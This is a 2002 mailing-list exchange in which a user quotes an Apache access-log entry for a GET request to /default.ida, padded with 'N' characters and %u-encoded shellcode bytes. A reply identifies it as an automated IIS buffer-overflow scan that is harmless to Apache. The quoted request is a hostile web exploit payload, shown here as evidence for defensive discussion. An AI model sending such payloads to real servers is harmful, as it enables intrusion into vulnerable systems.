[ale] Found in my acess_log (httpd)
Michael Golden
naugrimk at yahoo.com
Sun Feb 10 13:44:56 EST 2002
On Sun, 2002-02-10 at 15:27, Adrin wrote:
> I found this in my access_log file.
> This is a log of http request , I think.
> :)
>
> 217.118.42.38 - -
> [05/Feb/2002:07:16:18 -0500] "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9
> 090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u6858%ucbd3%u7801%u9090%u909
> 0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a HTTP/1.0" 400 349 "-"
> "-"
>
>
> Is someone trying to run a buffer over
> flow?
Looks like just another IIS type exploit. Probably not someone
specifically targetting you but just a scan type thing. I assume you are
running apache and so it is an annoyance but won't hurt anything.
(Except maybe your bandwidth a little if you get enough of them)
Michael
This is a digitally signed message part
More information about the Ale
mailing list